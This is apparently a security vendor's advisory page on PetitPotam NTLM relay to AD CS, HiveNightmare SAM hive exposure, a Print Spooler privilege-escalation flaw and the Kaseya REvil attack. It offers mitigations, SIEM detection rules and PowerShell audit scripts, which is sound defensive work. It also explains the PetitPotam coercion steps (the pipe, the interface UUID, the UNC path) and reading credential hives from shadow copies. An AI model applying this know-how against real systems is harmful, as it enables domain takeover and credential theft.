    This primarily affects organizations that run Active Directory Certificate Services (AD CS), Microsoft’s public key infrastructure (PKI) server role.

    PetitPotam is considered a NTLM (NT LAN Manager) relay attack, a form of manipulator-in-the-middle attack. Microsoft has previously provided workarounds to avoid similar NTLM attacks.

    How Bad is This?

    An attacker who can reach a DC (or any domain-joined Windows host) over SMB can coerce it into authenticating to a host of the attacker’s choosing without first authenticating themselves. They connect to the target’s LSARPC named pipe (\\target\pipe\lsarpc), bind to the MS-EFSRPC interface (UUID c681d488-d850-11d0-8c52-00c04fd90f7e) and call an EFSRPC method with a UNC path that points at the attacker’s machine; the target then opens that path and sends its machine account’s NTLM authentication, which the attacker captures and relays. Where AD CS web enrollment accepts NTLM, relaying a DC’s machine-account authentication yields a certificate for the DC, and with it a complete takeover of the domain.

    Per Microsoft’s MS-EFSRPC documentation this should be an authenticated connection, but PetitPotam testing shows the calls succeed without one on unpatched hosts. Once relayed, the coerced authentication can be used to escalate further into the environment, potentially resulting in a full takeover.

    Domain controllers and other domain-joined Windows hosts are the coercion targets; the domain takeover path additionally needs a server running Active Directory Certificate Services (AD CS) with the web enrollment endpoints installed. From an Administrator PowerShell console, run Get-WindowsFeature ADCS-Web-Enrollment (and ADCS-Enroll-Web-Svc) to determine whether those features are installed on your hosts.

    This makes the vulnerability fairly dangerous, more so than the recently reported SAM database exposure known as HiveNightmare.

    Update 7/27 1:00 PM ET: For this attack to work, the attacker must be able to relay the coerced authentication to a DC or another internal system, so they need either a malicious host of their own on the LAN or SYSTEM/Administrator on an existing host in the environment. With HiveNightmare, PrintNightmare and the related privilege escalation issues of recent weeks, that escalation step is not necessarily complex, depending on the posture of the environment.

    What Should I Do?

    Microsoft recommends the following steps:

    To prevent NTLM Relay Attacks on networks with NTLM enabled, domain administrators must ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) or signing features such as SMB signing. PetitPotam takes advantage of servers where Active Directory Certificate Services (AD CS) is not configured with protections for NTLM Relay Attacks. The mitigations outlined in KB5005413 instruct customers on how to protect their AD CS servers from such attacks.

    Blumira also recommends reviewing if the following actions will work for your environment:

    • Consider removing Web Enroll from your Certificate Service noted above, specifically Certificate Authority Web Enrollment and Certificate Enrollment Web Service. Most modern implementations utilize the RPC calls and not the web-focused services. This can break your environment and should be tested if you do not know how Web Enrollment vs RPC Enrollment is utilized.
    • Broadly disable NTLM on all AD CS and DC servers via the GPO setting Network security: Restrict NTLM: Incoming NTLM traffic (set to Deny all accounts). This forces Kerberos and prevents the attack from provoking an NTLM authentication out of those servers. As with any NTLM change, test first: legacy solutions may still depend on NTLM. There are further steps to restricting NTLM more broadly, but this one halts the PetitPotam trigger.
    • If you want to limit the scope of the change, remove the NTLM provider in IIS Manager on the affected servers: Sites -> Default Web Site -> CertSrv -> Authentication -> Windows Authentication -> Providers, leaving only Negotiate:Kerberos. Warning: this may affect authentication depending on your current use of NTLM.
    • Validate whether Extended Protection for Authentication (EPA) is set to Required on the CertSrv endpoints. EPA does not stop the coercion itself, but it binds the NTLM exchange to the TLS channel, so a relayed authentication that originates on another host is rejected.
    • Enable SMB signing to blunt relay to SMB endpoints. Like disabling NTLM, this requires testing because of the potential impact on legacy solutions.
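    The options above are easier to act on once you know where a given CA stands. The script below is an added example for this article, not tooling from Microsoft or Blumira: run elevated on an AD CS server, it reports whether the web enrollment roles are installed, which Windows authentication providers and EPA setting the CertSrv application uses, whether incoming NTLM is restricted, and whether SMB signing is required. It assumes the ServerManager and WebAdministration modules are available and that web enrollment sits at the default Default Web Site/CertSrv location.

```powershell
# Added example (not from the original advisory): audit the settings that
# decide whether a relayed NTLM authentication lands on this CA. Run elevated
# on the AD CS server. Assumes the ServerManager and WebAdministration modules
# are present and that web enrollment is at the default Default Web Site/CertSrv.
Import-Module ServerManager, WebAdministration -ErrorAction Stop

function Get-AdcsRelayPosture {
    $site    = 'IIS:\Sites\Default Web Site\CertSrv'
    $winAuth = 'system.webServer/security/authentication/windowsAuthentication'

    # 1. Web enrollment roles installed? Without them the PetitPotam -> AD CS
    #    relay target (HTTP enrollment accepting NTLM) is absent on this host.
    $features  = Get-WindowsFeature -Name ADCS-Web-Enrollment, ADCS-Enroll-Web-Svc
    $webEnroll = @($features | Where-Object Installed).Count -gt 0

    $providers = @()
    $epa = 'n/a'
    if ($webEnroll -and (Test-Path $site)) {
        # 2. Windows auth providers on /CertSrv. "NTLM", or a bare "Negotiate"
        #    (which falls back to NTLM), accepts relayed authentication;
        #    "Negotiate:Kerberos" alone is the hardened state described above.
        $providers = @(Get-WebConfiguration -PSPath $site -Filter "$winAuth/providers/add" | ForEach-Object { $_.value })
        # 3. Extended Protection: "Require" binds NTLM to the TLS channel, so a
        #    relay that originates on another host is rejected.
        $epa = [string](Get-WebConfiguration -PSPath $site -Filter "$winAuth/extendedProtection").tokenChecking
    }

    # 4. Registry backing of "Restrict NTLM: Incoming NTLM traffic":
    #    0/absent = allow all, 1 = deny domain accounts, 2 = deny all accounts.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0' -ErrorAction SilentlyContinue
    $restrictNtlm = if ($lsa -and $null -ne $lsa.RestrictReceivingNTLMTraffic) { [int]$lsa.RestrictReceivingNTLMTraffic } else { 0 }

    # 5. Server-side SMB signing required (1) or merely enabled/absent.
    $srv = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -ErrorAction SilentlyContinue
    $smbSigning = [bool]($srv -and $srv.RequireSecuritySignature -eq 1)

    $weakProvider = ($providers -contains 'NTLM') -or ($providers -contains 'Negotiate')
    [pscustomobject]@{
        WebEnrollmentInstalled = $webEnroll
        CertSrvAuthProviders   = ($providers -join ', ')
        CertSrvEPA             = $epa
        # True when a relayed DC authentication would be accepted by /CertSrv.
        RelayableCertSrv       = $webEnroll -and $weakProvider -and ($epa -ne 'Require') -and ($restrictNtlm -ne 2)
        RestrictIncomingNTLM   = $restrictNtlm
        SmbSigningRequired     = $smbSigning
    }
}

Get-AdcsRelayPosture | Format-List
```

    RelayableCertSrv is the field to act on: a CA that reports it true is the relay target PetitPotam needs, and any one of the bullets above (removing web enrollment, dropping the NTLM provider, requiring EPA, or denying incoming NTLM) flips it to false.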

    How To Detect

    During testing, Blumira identified some methods to detect the exact behavior associated with some PetitPotam actions such as 3 connection events with 5145, 5140, 4624 event IDs ending in an ANONYMOUS LOGON.

    Depending on the hygiene of your environment, the following three detections will show a trigger from both the anonymous and user-authenticated forms of PetitPotam, and will also surface problem areas in your environment more generally.

    Anonymous Bind to RPC during PetitPotam, as well as any Anonymous connections.

    windows_event_id=4624 AND user='ANONYMOUS LOGON' AND authentication_package='NTLM'

    Elevated User Access without Source Workstation. You can enhance this by ignoring all src/client IPs that are not private in most cases.

    windows_event_id=4624 AND elevated=true AND package_name="NTLM V2" AND workstation_name is null

    For organizations with SIEMs that do not abstract out Windows event logic, elevated=true for Blumira is the same as Elevated Token:%%1842

    **New Detection 7/27 1:00 PM ET**: Detailed File Share Access with a Specific Set of Accesses and Sources – This does require Auditing of Detailed File Share to be enabled resulting in 5145 Windows Event ID, Blumira Logmira GPO template can help with this visibility.
    windows_event_id=5145 AND object_name LIKE '%IPC%' AND file_path in ('lsarpc','efsrpc','lsass','samr','netlogon') AND access_granted LIKE '%ReadData%WriteData (or AddFile)%'
    In testing, we’ve determined that when the PetitPotam attack is executed, it interacts with machines in such a way that it is fingerprintable. By identifying the pipes utilized by PetitPotam, the object (IPC), and the specific accesses granted while executing the credential provoke it is detectable with limited false positives.
    Below is an example 5145 Event of a normal user (nbob) being used to execute PetitPotam for your own SIEM mapping. The same accesses and patterns appear when an Anonymous Logon bind occurs as well.

    A network share object was checked to see whether client can be granted desired access.

    Subject:

    Security ID: ABCXSS\nbob

    Account Name: nbob

    Account Domain: ABCXSS

    Logon ID: 0xA1535D

    Network Information:

    Object Type: File

    Source Address: 192.168.10.131

    Source Port: 47558

    Share Information:

    Share Name: \\*\IPC$

    Share Path:

    Relative Target Name: efsrpc

    Access Request Information:

    Access Mask: 0x3

    Accesses: ReadData (or ListDirectory)

    WriteData (or AddFile)
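    As an added example, not part of the original advisory, here is the same logic applied directly on a host with Get-WinEvent rather than in a SIEM: the first function matches the 5145 pattern above (IPC$ share, one of the coercion pipes as relative target, AccessMask 0x3) and the second finds anonymous NTLM network logons as in the 4624 query. It assumes you run it elevated on a DC or AD CS server with Detailed File Share and Logon auditing enabled; the pipe list and the 24-hour window are assumptions you may want to tune.

```powershell
# Added example (not from the original advisory): run the 5145 / 4624 logic
# above against a host's own Security log with Get-WinEvent. Assumes "Audit
# Detailed File Share" and "Audit Logon" are enabled and that you run this
# elevated on a DC or AD CS server (the hosts PetitPotam coerces).
$Pipes = 'lsarpc', 'efsrpc', 'lsass', 'samr', 'netlogon'   # assumed watch list

# Flatten the EventData of a Windows event into a hashtable keyed by Data Name.
function ConvertTo-EventData {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $data = @{}
    foreach ($node in ([xml]$Event.ToXml()).Event.EventData.Data) {
        $data[$node.Name] = $node.'#text'
    }
    $data
}

# Named-pipe access over IPC$ to one of the coercion pipes with AccessMask 0x3
# (ReadData + WriteData), the fingerprint shown in the sample event above.
function Find-PetitPotamPipeAccess {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 5145; StartTime = (Get-Date).AddHours(-$Hours) }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $d = ConvertTo-EventData $e
        if ($d.ShareName -like '*IPC$*' -and $Pipes -contains $d.RelativeTargetName -and $d.AccessMask -eq '0x3') {
            [pscustomobject]@{
                Time      = $e.TimeCreated
                Account   = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Source    = "$($d.IpAddress):$($d.IpPort)"
                Pipe      = $d.RelativeTargetName
                Anonymous = ($d.SubjectUserName -eq 'ANONYMOUS LOGON')
            }
        }
    }
}

# Anonymous NTLM network logons (LogonType 3): the unauthenticated variant
# of the trigger, equivalent to the first SIEM query above.
function Find-AnonymousNtlmLogon {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddHours(-$Hours) }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $d = ConvertTo-EventData $e
        if ($d.TargetUserName -eq 'ANONYMOUS LOGON' -and $d.AuthenticationPackageName -eq 'NTLM' -and $d.LogonType -eq '3') {
            [pscustomobject]@{ Time = $e.TimeCreated; Source = $d.IpAddress; Workstation = $d.WorkstationName }
        }
    }
}

Find-PetitPotamPipeAccess | Format-Table -AutoSize
Find-AnonymousNtlmLogon   | Format-Table -AutoSize
```

    Matching on AccessMask 0x3 rather than on the rendered "ReadData (or ListDirectory)" text avoids depending on message localisation; a hit from a source address that is not a known administration host, or from ANONYMOUS LOGON at all, is worth investigating immediately.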

    For further technical details, see:

    Blumira provides a security guide on How to Configure SMB (Server Message Block) Signing to help you avoid man-in-the-middle attacks on your network.

    Detect Indicators of Attacks With Blumira

    Blumira can detect activity that is indicative of NTLM Relay attacks, as well as many other Microsoft security incidents. By easily integrating Blumira’s detection and response platform with your Windows environment, you can identify indicators of an attack in progress and contain threats to minimize their impact.

    Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for a free trial to start detecting and mitigating exposure related to Windows vulnerabilities.

    Medium
    July 20, 2021

    SAM Database in Windows 10 (HiveNightmare)

    Microsoft Security

    What Happened?

    On July 13, Microsoft released CVE-2021-33757, which enabled AES encryption by default to the remote protocol connection for MS-SAMR to mitigate the downgrade to RC4, which exposed data through insecure encryption. Microsoft subsequently released a patch for the vulnerability, KB5004605, which made changes related to the MS-SAMR protocol. Microsoft stated in documentation for the patch:

    After installing the July 13, 2021 Windows updates or later Windows updates, Advanced Encryption Standard (AES) encryption will be the preferred method on Windows clients when using the legacy MS-SAMR protocol for password operations if AES encryption is supported by the SAM server.

    On July 19, Kevin Beaumont (@GossiTheDog on Twitter) reported a Windows 10 issue that allows non-administrators to read the Security Account Manager (SAM) database, which stores the hashed credentials of local accounts. He dubbed it HiveNightmare, aka SeriousSAM.

    Oh dear. I need to validate this myself, but it seems like MS may have goofed up and made the SAM database (user passwords) accessible to non-admin users in Win 10. https://t.co/cdxiH1AIuB

    — Kevin Beaumont (@GossiTheDog) July 19, 2021

    Benjamin Delpy, creator of Mimikatz (@gentilkiwi on Twitter), confirmed the behaviour on the latest version of Windows 10.

    The SYSTEM hive was exposed by the same ACL change. Because SYSTEM holds the boot key that protects the SAM, an attacker with both files can recover every local account’s password hash.

    How Bad is This?

    On affected versions of Windows, the SAM, SYSTEM and SECURITY hive files under %windir%\System32\config carry an ACL entry that grants Read to BUILTIN\Users. Any authenticated user can therefore obtain the hives (via a shadow copy, since the live files are locked) and use the cached credentials for offline cracking or pass-the-hash, depending on the environment configuration. So far this has only been confirmed on updated Windows 10 endpoints, but Windows Server may also be affected.

    The following builds have been identified as impacted so far:

    • 1809 ISO-June21 – 20H2
    • 1909 ISO-June21 – 20H2
    • 20H2 ISO-orig – 21H1
    • 21H1 ISO-June21 – 11 Insider (Windows 11)

    You can identify your build by looking at winver in Run (Win + R)

    As of 7/20/21, this attack pattern has been proven and is a potential privilege escalation path for attackers. If a Computer or Domain Admin has recently logged into a host that was impacted by this change, their hashed credentials would be cached on the host in these files. This could potentially give an attacker full access to your environment without requiring escalation to Administrator to access these credentials.

    What Should I Do?

    We recommend that you wait for Microsoft to release remediation steps. In the meantime, you can do a few things:

    • Monitor for SAM access on the host itself to determine if an attacker is attempting to dump and escalate.
    • Prepare to patch when Microsoft has released their fix or mitigation for this issue. This is the safest way to respond to this issue as Microsoft will need to unroll the ACL changes that they added.
    • If the machine is critical to your environment from a security perspective, reset the ACLs on the affected folder back to default. This carries some risk, as you are changing ACLs set by the Windows update; in our testing it has not negatively impacted the host, but that does not mean it won’t on other configurations.
      • From an Administrator PowerShell command line:
        Get-ChildItem -File -Force $env:WINDIR\system32\config | ForEach-Object { icacls $_.FullName /reset }
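    To choose between the options above you need to know whether a given host is actually exposed and which shadow copies it holds. The following script is an added example for this article, not tooling from Microsoft or Blumira: it reports any BUILTIN\Users read ACE on the SAM, SYSTEM and SECURITY hives, lists shadow copies with their \\?\GLOBALROOT device paths, and with -Fix re-enables ACL inheritance on %windir%\System32\config (Microsoft’s icacls /inheritance:e workaround). It assumes an elevated session on Windows 10 or Windows Server 2016 or later, and it deliberately does not delete shadow copies.

```powershell
# Added example (not from the original advisory): report whether the local
# hives grant BUILTIN\Users read access and which shadow copies could expose
# them, then optionally re-enable ACL inheritance. Run elevated; -Fix is the
# only part that changes the host, and shadow copies are never deleted here.
function Get-HiveExposure {
    param([switch]$Fix)
    $configDir = Join-Path $env:WINDIR 'System32\config'
    $readData  = [int][System.Security.AccessControl.FileSystemRights]::ReadData

    foreach ($name in 'SAM', 'SYSTEM', 'SECURITY') {
        $path = Join-Path $configDir $name
        $acl  = Get-Acl -Path $path        # READ_CONTROL works even though the hive is locked
        # Any Allow ACE for BUILTIN\Users carrying the ReadData bit is the
        # HiveNightmare condition; a default install grants Users nothing here.
        $usersRead = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
            (([int]$_.FileSystemRights -band $readData) -ne 0)
        }).Count -gt 0
        [pscustomobject]@{ Hive = $path; UsersCanRead = $usersRead }
    }

    # Shadow copies keep the bad ACL after it is fixed on the live volume, and
    # \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN is readable without admin
    # rights, so list them to decide whether to delete them or let them age out.
    Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{ ShadowCopy = $_.DeviceObject; Created = $_.InstallDate; Volume = $_.VolumeName }
        }

    if ($Fix) {
        # Same effect as Microsoft's "icacls %windir%\system32\config\*.* /inheritance:e".
        & icacls.exe "$configDir\*.*" /inheritance:e | Out-Null
    }
}

Get-HiveExposure
```

    A host that reports UsersCanRead = True for any hive and has at least one shadow copy listed is exploitable by any local user until both the ACL is corrected and the old shadow copies are gone or rolled over.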

    How To Detect

    Blumira recommends monitoring for actions against the HKLM System, Security, and SAM databases on all systems. Due to this incorrect ACL change by Microsoft, it is now an even higher priority to monitor these actions. Below is an example of utilizing Sysmon to monitor for reg.exe actions against the System, Security, or SAM files.

    This may require some changes based on your SIEM, e.g., escaping slashes and regex match formatting. Blumira customers who utilize Sysmon will already have this rule deployed to their environments.

    windows_log_source="Microsoft-Windows-Sysmon" AND process_name LIKE "%reg.exe%" AND REGEXP_CONTAINS(command, "HKLM\\\\system|HKLM\\\\security|HKLM\\\\sam")

    Blumira also recommends monitoring WMIC, Shadow-Copy, and any actions that would involve the instantiation of Mimikatz, which can all leverage this exposure.

    Update 7/21/21 (courtesy of Reddit user u/eider96)

    • This has nothing to do with KB5004605
    • The RX access for BU\Users does not allow for direct access to these files as they are protected, they can only be accessed if previously VSS snapshot has been made with these files (which is default action given either File History or System Restore are enabled). Unprivileged users can leverage such snapshots and use the improper permissions to take out files from it. Administrator permissions are not required to read snapshot, they are directly accessible via \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{$N} where {$N} is snapshot number. Administrators can list all snapshots using vssadmin list shadows.
    • The PS snippet provided is not meant to secure system alone. Also consider existing snapshots and either remove them or accept the risk and let them be overwritten as time goes on.
    • Because the files can be copied offline from VSS snapshot and then inspected manually or hive loaded on separate system, monitoring for actions against these hives is not guaranteed to provide any meaningful results in relation to this specific vulnerability – there is no reason to modify or load the hive online in order to extract cached credentials from recovered files.

    Update 7/21/21 (courtesy of Reddit user u/Oscar_Geare):

    Microsoft has released a CVE for this vulnerability. In the CVE they identify that it affects all versions 1809 and newer. Additionally there is a workaround available:

    • Restrict access to the contents of %windir%\system32\config
      • Open Command Prompt or Windows PowerShell as an administrator.
      • Run this command: icacls %windir%\system32\config\*.* /inheritance:e
    • Delete Volume Shadow Copy Service (VSS) shadow copies
      • Delete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\system32\config.
      • Create a new System Restore point (if desired).

    Our comments (7/21/21):

    Only delete shadow copies with some level of knowledge you do not need them. Validation of backups is ideal and you can use vssadmin list shadows to see most of your shadow copies.

    Since Microsoft’s patching credibility has taken a big hit in the past few weeks, it’s not a bad idea to test the patch once implemented as well.

    Update – Detections and Future Proofing (07/21/21 at 12:45 PM ET)

    Since the ACL changes that occurred within the host poisoned the VSS, you can take some steps to secure a system. This includes deleting VSS snapshots once ACLs have been resolved — or at the least, protecting those VSS snapshots until they are patched and rolled over with new snapshots.

    Blumira is currently testing and implementing three separate detections for this, one of which is more forward-looking to ensure visibility for hive files living inside of VSS. These detections either require Sysmon or for you to have defined advanced auditing on hosts using GPOs such as Blumira’s Logmira.

    • Identification of HiveNightmare runs based on hardcoded string patterns using Sysmon. This will be easy to avoid for many attackers but will identify the reuse of existing attacks.
      type='windows' AND windows_log_source='Microsoft-Windows-Sysmon' AND windows_event_id in (1,5,11) AND ((process_name LIKE '%HiveNightmare%') or (regexp_contains(target, '(?i)S.*haxx$')))
    • Identification of Powershell referring to sensitive Hive files within VSS using Script Block logging. This assumes your script block logs into the info column and uses the case insensitive (?i) flag. *Requires script block logging to be enabled for Powershell.*
      type='windows' AND windows_event_id=4104 AND REGEXP_CONTAINS(info, r'(?i)\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d{1,2}\\Windows\\System32\\config\\(system|security|sam)')
    • Identification of reads of sensitive hive files by anyone on the host using SACLs that flow into VSS. This gave a significant increase in visibility for any hive access in our testing so far. It won’t change your existing VSS snapshots until another restore point is recorded. *Requires the object access GPO to be enabled (see Logmira) and the PowerShell below to be run on each host.*
      type='windows' AND windows_event_id=4663 AND REGEXP_CONTAINS(object_name, r'(?i)Device\\HarddiskVolumeShadowCopy\d+\\Windows\\System32\\config\\(system|security|sam)')
      The following PowerShell enables the auditing SACL on the hive files, which VSS will then carry into new snapshots. It adds a ReadData Success audit rule for Everyone, giving broad future visibility into any user, privileged or not, reading the hive files.
      $files = @("C:\Windows\System32\config\system", "C:\Windows\System32\config\sam", "C:\Windows\System32\config\security")
      foreach ($file in $files) {
          $acl = Get-Acl $file
          $auditRule = New-Object System.Security.AccessControl.FileSystemAuditRule("Everyone", "ReadData", "Success")
          $acl.SetAuditRule($auditRule)
          $acl | Set-Acl $file
          Write-Host "Getting ACL for $file, Audit column should state Everyone Success ReadData"
          Get-Acl $file -Audit | Format-List
      }

    Try Blumira Today

    Blumira can detect activity related to the HKLM System, Security, and SAM databases, as well as many other security incidents.

    Blumira’s trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for a trial to start detecting and mitigating exposure related to Windows vulnerabilities

    Critical
    July 16, 2021

    CVE-2021-34481 Print Spooler Vulnerability

    What Happened?

    Jacob Baines (@Junior_Baines on Twitter), a Dragos vulnerability researcher, discovered another vulnerability in Print Spooler. Microsoft released an advisory for the vulnerability on Thursday, July 15.

    How Bad is This?

    It’s not as bad as the PrintNightmare vulnerabilities, one of which was classified as a remote code execution (RCE) vulnerability that allowed threat actors to execute any code on a remote machine.

    CVE-2021-34481, on the other hand, is a local privilege escalation to SYSTEM: an attacker already needs to be running code on the machine, whether through physical access or an earlier compromise.

    The CVSS Severity Rating of CVE-2021-34527 was 8.8, whereas CVE-2021-34481 is rated 7.8.

    Is This Related To PrintNightmare (CVE-2021-1675 and CVE-2021-34527)?

    Not exactly. This vulnerability also lives in Print Spooler, but it is purely a local privilege escalation (LPE) and therefore has a different security impact from a true RCE like PrintNightmare. According to Jacob Baines, it is not a variant of PrintNightmare.

    What Should I Do?

    Microsoft recommends stopping and disabling the Print Spooler service until a patch is available; its advisory gives the PowerShell commands for doing so (Stop-Service, then Set-Service to set the startup type to Disabled).

    However, this workaround leaves end users unable to print, and many organizations consider printing a crucial business operation.

    Organizations should take a similar approach to PrintNightmare and assess their exposure, consider business needs, thoroughly test any proposed changes, and win the explicit support of business leadership before making any changes to infrastructure that could impact business operations.
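    Before acting on that advice it helps to know which hosts actually depend on the spooler. The script below is an added example for this article, not Microsoft’s or Blumira’s tooling: Get-SpoolerExposure reports the service state, whether the host is a domain controller and how many printers it shares, and Disable-Spooler applies the Microsoft workaround (Stop-Service, then Set-Service -StartupType Disabled) only when that looks safe or when -Force is given. It assumes the PrintManagement module is present for the shared-printer check; where it is missing, SharedPrinters is reported as unknown.

```powershell
# Added example (not from the original advisory): assess a host's Print Spooler
# exposure before applying Microsoft's workaround of stopping and disabling the
# service. Assumes the PrintManagement module (Get-Printer) is present; where
# it is missing, SharedPrinters is $null (unknown) and the gate stays closed.
function Get-SpoolerExposure {
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    # DomainRole 4/5 = backup/primary domain controller: the hosts where a
    # SYSTEM-level LPE matters most and where printing is almost never needed.
    $role   = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole
    $shared = $null
    if (Get-Command -Name Get-Printer -ErrorAction SilentlyContinue) {
        $shared = @(Get-Printer -ErrorAction SilentlyContinue | Where-Object Shared).Count
    }
    $status = if ($svc) { [string]$svc.Status } else { 'NotInstalled' }
    $start  = if ($svc) { [string]$svc.StartType } else { $null }
    [pscustomobject]@{
        Computer           = $env:COMPUTERNAME
        SpoolerStatus      = $status
        StartType          = $start
        IsDomainController = ($role -ge 4)
        SharedPrinters     = $shared
        # Low-risk to disable when the box is a DC or shares no printers;
        # anything else needs the business sign-off described above.
        SafeToDisable      = [bool]($svc -and $status -eq 'Running' -and ($role -ge 4 -or $shared -eq 0))
    }
}

function Disable-Spooler {
    param([switch]$Force)   # -Force overrides the SafeToDisable gate after sign-off
    $x = Get-SpoolerExposure
    if (-not $x.SafeToDisable -and -not $Force) {
        Write-Warning "Spooler on $($x.Computer) serves $($x.SharedPrinters) shared printer(s); not disabling. Re-run with -Force after sign-off."
        return $x
    }
    Stop-Service -Name Spooler -Force
    Set-Service  -Name Spooler -StartupType Disabled
    Get-Service  -Name Spooler | Select-Object Name, Status, StartType
}

Get-SpoolerExposure | Format-List
```

    Running Get-SpoolerExposure across a fleet (for example through Invoke-Command) gives the exposure inventory the paragraph above asks for; domain controllers with a running spooler are the first place to apply Disable-Spooler.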

    Why Is Print Spooler So Problematic?

    The Windows Print Spooler has been a publicly known source of vulnerabilities since at least 2010, when the Stuxnet operation that allegedly targeted Iran’s nuclear program used a spooler flaw (MS10-061) to spread. Spooling has been a feature of Windows and other operating systems for decades, and it directly supports the business-critical act of printing. That may be the fundamental issue: legacy code that by design copies files between machines and performs privileged operations such as remote driver installation is exposed as a routine network service, on a range of attractive Windows infrastructure targets.

    Microsoft is continuously updating their operating system, as seen in new releases. What’s unclear is if Windows’ own Print Spooler has been the beneficiary of any such code update in that period of time. Microsoft’s decades-long tenure as provider of the preeminent private and commercial OS also created pressure on the company to maintain reverse compatibility with older printer technology, not to mention unsupported versions of Windows. While it is common in legacy solutions to avoid breaking changes to avoid hurting critical use, this can result in long-term bugs that can be leveraged into exploits.

    Thus far, Microsoft appears to favor patching very specific Spooler issues as vulnerabilities like CVE-2021-1675, CVE-2021-34527 and CVE-2021-34481 arise rather than re-code the entire legacy code set, a common approach by software vendors.

    Dedicating resources to produce new Spooler code is unlikely to yield new or increased revenue as compared to other elements of a new OS. Printing is printing; the whole function can only be improved so much, and that doesn’t even account for the fact that the printing industry is in a state of decline as businesses increasingly opt for soft copies of documents rather than hard copies, and the paperless movement gains traction.

    The tradeoff of the business decision means that each new OS carries legacy (maybe very legacy?) code rife with relatively discoverable vulnerabilities unknown to the original Windows Print Spooling service developers. Like the internet itself, printer spooling was largely conceived of long before security was a major software development design principle.



    Critical
    July 8, 2021

    Lessons Learned From REvil’s Ransomware Attack On Kaseya

    On Friday, July 2, a vulnerability in Kaseya’s on-premises VSA software was used to launch a REvil “supply-chain” ransomware attack.

    Ransomware

    On Friday, July 2, a vulnerability in Kaseya’s on-premises VSA software was used to launch a REvil “supply-chain” ransomware attack. The attack impacted 50 MSPs and up to 1,500 small businesses that are managed by Kaseya’s customers, according to Kaseya.

    This is yet another high-profile attack by REvil, which illustrates the group’s ability to leverage Advanced Persistent Threat (APT)-like attacks across the internet.

    Here’s a breakdown of what happened and how IT and security teams can learn from the attack.

    What Happened?

    This was not a supply-chain attack in the SolarWinds sense, where the vendor’s own build pipeline was compromised and a trojanized update was pushed to customers over an extended period. The supply-chain component here is that REvil abused the MSPs’ Remote Monitoring and Management (RMM) tooling, the same channel used for software delivery and patching, to push its payload to managed endpoints.

    The attackers identified a chain of vulnerabilities in the on-premises Kaseya VSA server, which organizations often run in their DMZs. That, combined with how quickly REvil moves once it has a foothold, led Kaseya and security vendors serving MSPs, such as Huntress, to tell all Kaseya VSA users to shut their servers down.

    This attack reintroduces the pain point of unknown unknowns in the attack surfaces which are exposed to the internet that can result in zero-day exploitation. In this case, the Kaseya VSA RMM distribution is hosted on-premises within MSPs’ DMZs so endpoints can check in from the internet. We now know that Kaseya VSA had a number of previously unknown vulnerabilities as well as one vulnerability known to Kaseya that was not yet patched.

    These vulnerabilities — ranging from Improper Authentication Validation to SQL Injection — were exploited in a chain that allowed REvil to push their first stage of attacks across all connected agents.

    In cases where MSPs had Web Application Firewalls (WAF) in front of their Kaseya VSA, they likely were able to mitigate the attacks, whereas organizations with only general Intrusion Prevention and/or firewalling would have been quite vulnerable.

    The Impact of Modern Ransomware Attacks

    Any internet-facing application is a prime target for attackers. As ransomware groups like REvil move into APT-like tactics, the purchasing of exploits becomes a quick and lucrative method to expand the victim pool.

    Applications like RMMs, VPNs, MDMs, and business-centric solutions that result in shared attack surface are significant targets to groups like REvil. This is especially true for RMM, because threat actors can leverage these applications without performing additional pivots to deploy ransomware.

    With these changes in threat modeling by ransomware groups, organizations of all sizes — from SMB up to enterprise — are directly in the path of attack. Just the fact that these organizations ran an RMM solution in their DMZ that enabled their business needs resulted in broad exfiltration and encryption of their data.

    It is essential for everyone in IT and information security to review their attack surface and understand where threats could be introduced to their environments — no matter the size.

    Preventing Ransomware Attacks Like REvil

    Moving forward, you should adhere to some best practices to prevent future ransomware and APT-like attacks:

    • Evaluate external attack surface through scanning and tools like Censys or Shodan.
    • Minimize internet-facing applications to reduce your exposure to unknown vulnerabilities. A threat detection and response solution like Blumira can detect and alert on misconfigured exposures, for example RDP connections from a public IP.
    • Deploy dynamic blocklists to block malicious source IPs and domains to reduce your attack surface
    • Consider multiple RMM solutions: one for your critical server infrastructure and another for your workstations. While this creates some overhead, it does immediately cut risk.
    • Collect verbose logs by enabling Sysmon. It’s also important to centralize those logs and integrate them into a threat detection and response for more immediate alerting.
    • Ensure that permissions follow least privilege.
    • If your organization has a need for on-premises servers that are internet-facing, evaluate WAFs to create an additional layer of defense.
    • There will be more attacks; this is an inevitability at this point in the ecosystem of cybersecurity. Test your backup recovery time and success rates. Ensure that you have a plan to keep your data secure and that you are evaluating who and what actually has access to data. Limit your scope and save your sanity moving forward!

    How Blumira Helps Prevent Ransomware

    To prevent ransomware, it’s crucial to understand the behaviors that lead up to a ransomware attack, and then detect those behaviors. A detection and response platform like Blumira quickly detects and alerts on indicators of compromise, prioritizing alerts to prevent alert fatigue and unnecessary noise.

    Blumira detects many indicators of ransomware, including password spraying and unauthorized RDP access, enabling IT and security teams to catch a ransomware attack in its early stages. Blumira also takes ransomware prevention a step further by providing security playbooks to guide customers through remediation steps, as well as providing access to a team of security experts to give context and advice.

    Try Blumira for free; our trial is easy to deploy and can provide immediate security value to your organization.

    Medium
    July 6, 2021

